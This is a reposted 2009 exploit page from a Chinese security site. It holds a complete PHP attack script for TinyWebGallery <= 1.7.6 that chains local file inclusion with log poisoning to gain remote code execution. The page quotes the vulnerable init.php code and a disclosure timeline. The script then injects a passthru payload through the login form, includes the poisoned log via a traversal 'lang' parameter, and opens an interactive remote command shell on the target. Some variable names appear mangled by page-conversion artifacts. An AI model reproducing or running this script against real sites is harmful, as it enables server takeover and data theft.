首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
来源:travesti[at]travesti.in 作者:travesti 发布时间:2009-05-12  
<?php

/*
        -----------------------------------------------------------
        TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
        -----------------------------------------------------------
        
        author...: travesti
        mail.....: travesti[at]travesti.in
        
        link.....: http://www.travesti.in
        details..: this vulnerability drift from QuiXplorer (http://quixplorer.sourceforge.net/)
      exp link.: http://www.travesti.in/ex.txt

        This PoC was written for educational purpose. Use it at your own risk.
        Author will be not responsible for any damage.

        [-] vulnerable code in /admin/_include/init.php

        110.    // Get Language
        111.    if (isset($GLOBALS['__GET']["lang"]))  $GLOBALS["lang"] = $GLOBALS["language"] = 
___FCKpd___0
SESSION["admin_lang"] = $GLOBALS['__GET']["lang"]; 112. elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] =
___FCKpd___0
SESSION["admin_lang"] = $GLOBALS['__POST']["lang"]; 113. else if (isset(
___FCKpd___0
SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] =
___FCKpd___0
SESSION["admin_lang"]; 114. else $GLOBALS["language"] = $GLOBALS["default_language"]; 115. [...] 138. 139. // ------------------------------------------------------------------------------ 140. // Necessary files 141. require _QUIXPLORER_PATH . "/_config/conf.php"; 142. 143. if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php")) 144. require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"; 145. else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php")) 146. require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"; 147. else 148. require _QUIXPLORER_PATH . "/_lang/en.php"; An attacker could be able to include arbitrary local files through the require function at line 144, due to
___FCKpd___0
GET['lang'] parameter isn't properly sanitised. Successful exploitation requires magic_quotes_gpc = off [-] Disclosure timeline: [14/04/2009] - Bug discovered [25/04/2009] - Vendor contacted [26/04/2009] - Vendor replied [26/04/2009] - Fix released: http://www.tinywebgallery.com/forum/viewtopic.php?t=1653 [08/05/2009] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false) die("\nsocket_create(): " . socket_strerror($s) . "\n"); if (socket_connect($s, $host, 80) == false) die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n"); socket_write($s, $packet, strlen($packet)); while ($m = socket_read($s, 2048)) $response .= $m; socket_close($s); return $response; } function check_target() { global $host, $path; $packet = "GET {$path}info.php?showphpinfo=true HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; preg_match('/magic_quotes_gpc<\/td><td class="v">(.*)<\/td><td/', http_send($host, $packet), $match); if ($match[1] != "Off") die("\n[-] Exploit failed...magic_quotes_gpc = on\n"); } function inject_code() { global $host, $path; $code = "<?php \${print(_code_)}.\${passthru(base64_decode(\
___FCKpd___0
SERVER[HTTP_CMD]))}.\${die} ?>"; $payload = "p_user={$code}&p_pass="; $packet = "POST {$path}admin/index.php?action=login HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; http_send($host, $packet); } print "\n+---------------------------------------------------------------------+"; print "\n| TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit by EgiX |"; print "\n+---------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] host path\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /twg/\n"; die(); } $host = $argv[1]; $path = $argv[2]; check_target(); inject_code(); $packet = "GET {$path}admin/index.php?lang=../../counter/_twg.log%%00 HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while (1) { print "\ntwg-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n"); } ?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Exploits BLIND SQL INJECTION (
·Bitweaver <= 2.6 saveFeed() Re
·Personal FTP Server versions u
·MPLAB IDE 8.30 (.mcp) Universa
·CastRipper 2.50.70 (.m3u) Loca
·microTopic v1 (rating) Remote
·CastRipper 2.50.70 (.m3u) Univ
·eggBlog <= 4.1.1 Local Directo
·CastRipper 2.50.70 (.m3u) Univ
·Mereo 1.8.0 Arbitrary File Dis
·CastRipper 2.50.70 (.pls) Univ
·TYPSoft FTP Server 1.11 (ABORT
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved